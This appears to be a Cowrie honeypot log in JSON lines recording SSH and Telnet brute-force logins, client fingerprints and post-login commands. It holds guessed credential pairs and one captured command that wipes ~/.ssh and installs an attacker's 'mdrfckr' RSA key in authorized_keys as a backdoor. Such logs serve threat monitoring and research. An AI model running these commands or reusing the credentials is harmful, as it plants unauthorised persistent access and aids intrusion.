{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:10.293700Z","src_ip":"154.209.4.55","session":"c3d155c5ac64"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":36239,"dst_ip":"1.2.3.4","dst_port":22,"session":"54846f2bcd3e","protocol":"ssh","message":"New connection: 154.209.4.55:36239 (1.2.3.4:22) [session: 54846f2bcd3e]","sensor":"my-vps","timestamp":"2025-09-09T04:23:10.478715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:23:10.484831Z","src_ip":"154.209.4.55","session":"54846f2bcd3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:23:10.683156Z","src_ip":"154.209.4.55","session":"54846f2bcd3e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:23:11.467902Z","src_ip":"154.209.4.55","session":"54846f2bcd3e"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":54270,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cb81e20a1f2","protocol":"ssh","message":"New connection: 103.59.95.12:54270 (1.2.3.4:22) [session: 2cb81e20a1f2]","sensor":"my-vps","timestamp":"2025-09-09T04:23:12.354364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:23:12.355438Z","src_ip":"103.59.95.12","session":"2cb81e20a1f2"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:12.664346Z","src_ip":"154.209.4.55","session":"54846f2bcd3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:23:12.701034Z","src_ip":"103.59.95.12","session":"2cb81e20a1f2"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":36787,"dst_ip":"1.2.3.4","dst_port":22,"session":"961f404ba97f","protocol":"ssh","message":"New connection: 154.209.4.55:36787 (1.2.3.4:22) [session: 961f404ba97f]","sensor":"my-vps","timestamp":"2025-09-09T04:23:12.869420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:23:12.872701Z","src_ip":"154.209.4.55","session":"961f404ba97f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:23:13.077430Z","src_ip":"154.209.4.55","session":"961f404ba97f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:23:13.907210Z","src_ip":"154.209.4.55","session":"961f404ba97f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:14.114022Z","src_ip":"154.209.4.55","session":"961f404ba97f"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:14.118620Z","src_ip":"154.209.4.55","session":"c3d155c5ac64"}
{"eventid":"cowrie.login.success","username":"root","password":"Alpha123","message":"login attempt [root/Alpha123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:23:14.123710Z","src_ip":"103.59.95.12","session":"2cb81e20a1f2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:23:14.675218Z","src_ip":"103.59.95.12","session":"2cb81e20a1f2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:23:14.675980Z","src_ip":"103.59.95.12","session":"2cb81e20a1f2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:23:14.677034Z","src_ip":"103.59.95.12","session":"2cb81e20a1f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:14.944282Z","src_ip":"103.59.95.12","session":"2cb81e20a1f2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:23:15.915600Z","src_ip":"103.59.95.12","session":"2cb81e20a1f2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:23:15.916362Z","src_ip":"103.59.95.12","session":"2cb81e20a1f2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:23:16.184071Z","src_ip":"103.59.95.12","session":"2cb81e20a1f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:16.185029Z","src_ip":"103.59.95.12","session":"2cb81e20a1f2"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":59774,"dst_ip":"1.2.3.4","dst_port":22,"session":"97b679012407","protocol":"ssh","message":"New connection: 103.59.95.12:59774 (1.2.3.4:22) [session: 97b679012407]","sensor":"my-vps","timestamp":"2025-09-09T04:23:16.461694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:23:16.462794Z","src_ip":"103.59.95.12","session":"97b679012407"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:23:16.737796Z","src_ip":"103.59.95.12","session":"97b679012407"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":43944,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e59c5e224e4","protocol":"ssh","message":"New connection: 211.22.25.164:43944 (1.2.3.4:22) [session: 8e59c5e224e4]","sensor":"my-vps","timestamp":"2025-09-09T04:23:17.509718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:23:17.510336Z","src_ip":"211.22.25.164","session":"8e59c5e224e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:23:17.750107Z","src_ip":"211.22.25.164","session":"8e59c5e224e4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:23:17.872306Z","src_ip":"103.59.95.12","session":"97b679012407"}
{"eventid":"cowrie.login.failed","username":"super","password":"password123","message":"login attempt [super/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:23:18.748375Z","src_ip":"211.22.25.164","session":"8e59c5e224e4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:19.156797Z","src_ip":"103.59.95.12","session":"97b679012407"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":59786,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2729ce9605f","protocol":"ssh","message":"New connection: 103.59.95.12:59786 (1.2.3.4:22) [session: a2729ce9605f]","sensor":"my-vps","timestamp":"2025-09-09T04:23:19.415835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:23:19.416716Z","src_ip":"103.59.95.12","session":"a2729ce9605f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:23:19.681141Z","src_ip":"103.59.95.12","session":"a2729ce9605f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:19.990566Z","src_ip":"211.22.25.164","session":"8e59c5e224e4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:23:21.021923Z","src_ip":"103.59.95.12","session":"a2729ce9605f"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:21.289471Z","src_ip":"103.59.95.12","session":"2cb81e20a1f2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:21.295723Z","src_ip":"103.59.95.12","session":"a2729ce9605f"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":46068,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0b59686d47d","protocol":"ssh","message":"New connection: 152.32.190.168:46068 (1.2.3.4:22) [session: d0b59686d47d]","sensor":"my-vps","timestamp":"2025-09-09T04:23:41.070255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:23:41.071201Z","src_ip":"152.32.190.168","session":"d0b59686d47d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:23:41.326061Z","src_ip":"152.32.190.168","session":"d0b59686d47d"}
{"eventid":"cowrie.login.failed","username":"db2fenc","password":"db2fenc.123","message":"login attempt [db2fenc/db2fenc.123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:23:42.384770Z","src_ip":"152.32.190.168","session":"d0b59686d47d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:43.642433Z","src_ip":"152.32.190.168","session":"d0b59686d47d"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":56892,"dst_ip":"1.2.3.4","dst_port":22,"session":"62f6b7e89667","protocol":"ssh","message":"New connection: 51.81.118.153:56892 (1.2.3.4:22) [session: 62f6b7e89667]","sensor":"my-vps","timestamp":"2025-09-09T04:23:46.929039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:23:46.930220Z","src_ip":"51.81.118.153","session":"62f6b7e89667"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:23:47.027688Z","src_ip":"51.81.118.153","session":"62f6b7e89667"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59028,"dst_ip":"1.2.3.4","dst_port":22,"session":"79baf4625e0e","protocol":"ssh","message":"New connection: 212.227.125.160:59028 (1.2.3.4:22) [session: 79baf4625e0e]","sensor":"my-vps","timestamp":"2025-09-09T04:23:47.209175Z"}
{"eventid":"cowrie.login.failed","username":"gbase","password":"12345678","message":"login attempt [gbase/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T04:23:47.462897Z","src_ip":"51.81.118.153","session":"62f6b7e89667"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50810,"dst_ip":"1.2.3.4","dst_port":23,"session":"207f48165c88","protocol":"telnet","message":"New connection: 212.227.235.229:50810 (1.2.3.4:23) [session: 207f48165c88]","sensor":"my-vps","timestamp":"2025-09-09T04:23:47.618422Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:23:47.823690Z","src_ip":"212.227.235.229","session":"207f48165c88"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:23:47.844046Z","src_ip":"212.227.235.229","session":"207f48165c88"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T04:23:47.845566Z","src_ip":"212.227.235.229","session":"207f48165c88"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T04:23:47.846829Z","src_ip":"212.227.235.229","session":"207f48165c88"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-09-09T04:23:48.260656Z","src_ip":"212.227.125.160","session":"79baf4625e0e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:48.561571Z","src_ip":"51.81.118.153","session":"62f6b7e89667"}
